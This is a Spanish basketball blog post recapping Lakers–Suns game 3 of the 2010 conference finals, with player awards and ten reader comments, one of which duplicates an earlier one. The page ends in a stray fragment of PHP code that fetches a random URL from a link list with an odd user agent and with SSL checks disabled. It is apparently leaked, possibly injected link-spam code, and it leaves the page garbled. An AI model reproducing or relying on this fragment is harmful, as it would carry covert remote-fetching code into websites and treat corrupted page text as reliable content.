Playoffs 23/05/2010: No está todo dicho

24 de May de 2010 por TheDeerHunter

Empezábamos a pensar que estábamos ante los playoffs con menos sustancia de la historia. No podíamos esperar este gran desequilibrio entre los contendientes, en este caso todo unos finalistas de conferencia.

Antes del salto inicial Lakers y Celtics acumulaban un 5-0 a su favor sin apenas noticias de los otros finalistas. No parecía que iba a cambiar nada tras el primer cuarto disputado: Lakers le endosaban nuevamente a los Suns 32 puntitos sin mucha oposición.

Y en eso Gentry por fin dio con la tecla. Una zonita 2-3 que dio sus frutos por primera vez en toda la eliminatoria. Los amarillos tan sólo pudieron anotar 15 puntos en el segundo, con muy malos porcentajes y muchas pérdidas. También ayudó el hecho que, hasta el preciso instante de la primera técnica sancionada a Phil Jackson durante estos playoffs (y ya es curioso), los Suns llevaban un 13 de 15 en tiros libres mientras que su equipo un… 0 de 0. Los campeones, sin embargo, reaccionaron muy fuerte en el 3º. Encegados al intercambio de golpes rozaron un parcial de 40.

Si antes del choque se especulaba con que Bynum iba a ser sentado estos días para reservarlo para una hipotética final, anoche lo hizo a medias. Entre los problemas de faltas y lo mal que estuvo no llegó a estar en pista ni 10 minutos. En esta ocasión Odom no fue el factor X de los dos primeros duelos, también con problemas de faltas. Y Gasol tuvo que cumplir prácticamente él sólo contra un acertadísimo Stoudemire más Robin Lopez, que se puso las botas. Aguantando 45 minutos sin posibilidad de descanso provocaron que  tuviera que administrar sus fuerzas como también su agresividad. Por ahí la sólida defensa que habían mostrado antes se empezó a venir abajo.

Además, con un total de 17 balones perdidos los correosos Suns se vieron como pez en el agua. Hasta 18 puntos regalados al feroz contragolpe naranja. Nash y Richardson causaron estragos. Muy alto nivel de los titulares, contrastando con el mal juego de los reservas.

2-1 y vuelve a haber serie y finales de conferencia. Con los problemas con Bynum los Lakers no lo tienen todo hecho.

PREMIOS

MVP: Criticado hasta la saciedad por su falta de motivación y defensa, ayer Amare Stoudamire se dedicó un partidazo a la salud de sus detractores. 42 puntos y 11 rebotes que no se ven todos los días en un partido de playoffs.

Sorpresa: Al final, Robin Lopez se está destapando como un jugador importante en el entramado de los Suns. Anoche cuajño un buen partido anotando 20 puntos aunque sólo capturó 3 míseros rebotes. Seguimos prefiriendo al hermano mayor pero habrá que vigilarlo también…

Decepción: Artest y Odom no enchufaron como en días anteriores y los Lakers lo notaron. De todas maneras, peor día y peor serie lleva Channing Frye. 0 de 7 para un solo punto. Su confianza debe de estar tocada y casi hundida.

Esfuerzo en vano: A la pareja de siempre (Kobe, 36-9-11 y Pau,23-9), se les unió Derek Fisher, 18 puntos. Lástima que fuera el único que se dignó a echarles una mano.

Y MAÑANA…

Matchball para los Celtics y viendo como han ido los enfrentamientos anteriores sorprendería que de repente a los Magic les diera un ataque de vergüenza torera y pusieran lo que hay que poner sobre la mesa.

Comenta

10 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Mike Brown despedido, por cierto
    Crónica de una muerte anunciada

      Citar

  2. Love Denise dice:
    #2

    supongo que el proximo será van Gundy
    No he visto el suns-lakers, pero viendo las estadisticas, la mayor decepcion podría ser Bynum, más que Odom y Artest, no?

      Citar

  3. TheDeerHunter dice:
    #3

    Bynum está medio lesionado y apenas llegó a jugar.
    De hecho posiblemente tampoco no juegue en el 4º.

    Desde luego que es decepción y preocupación… pero en plano distinto a las malas actuaciones de Odom y Artest.

      Citar

  4. Love Denise dice:
    #4

    pero solo jugó 7 minutos…por sus 4 faltas no??

      Citar

  5. TheDeerHunter dice:
    #5

    bueno… Odom llegó a ser expulsado y jugó bastante más minutos

    no es un problema exclusivamente de faltas, según tengo entendido… Phil Jackson ha dicho algo al respecto, junto con su concurso para el siguiente partido

      Citar

  6. Marcaco dice:
    #6

    Odom y Brwon perdieron el partido. Odom se desquició y Brown…. mejor no decir nada de Brown….
    Ah y Gasol una madre en defensa…

    Conclusión 4-1, ha sido un lapsus esto.

      Citar

  7. TheDeerHunter dice:
    #7

    Si Gasol se hubiera aplicado en defensa… habríamos terminado jugándonos el partido con Powell y Mbenga. Además de que dudo bastante que hubiera podido mantener 45 minutos de alta intensidad defensiva.

    Hasta en ser “blando”, Gasol hace siempre lo que necesita el equipo. La única posibilidad de los Lakers anoche es precísamente que lo fuera.

      Citar

  8. pcerezo dice:
    #8

    Estamos exigiendo un 4-0, eso significa la excelencia. Suns es un muy buen equipo y ganar un partido entra dentro de los planes de los Lakers.
    Está claro que Gasol-Bryant ganan un campeonato pero necesitan sobre todo a Odom. Es sin duda el que balancea la liga. Si Odom juega a nivel alto los demás equipos están jodidos porque lo que tiene Lakers no lo tiene nadie. Si vemos al Odom de la regular season los Lakers se hacen más previsibles y más fácil defendibles.
    Estoy con Deer, jugar 45 minutos a un nivel alto de defensa significaría sacrificar anotación…de donde recortas en un partido en el que Odom y Artest no están al 50%?

    Un saludo,
    Pablo

      Citar

  9. aro_pasado_no_newtoniano dice:
    #9

    Esto entra perfectamente dentro del guión. Creo que Frye y/o un partido ultraanotador de Nash deben de aparecer. Menos mal que hizo eso Amaré,,en los dos primeros parecía un pseudopaquete.

      Citar

  10. Steve dice:
    #10

    Bynum está medio lesionado y apenas llegó a jugar.
    De hecho posiblemente tampoco no juegue en el 4º.

    Desde luego que es decepción y preocupación… pero en plano distinto a las malas actuaciones de Odom y Artest.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>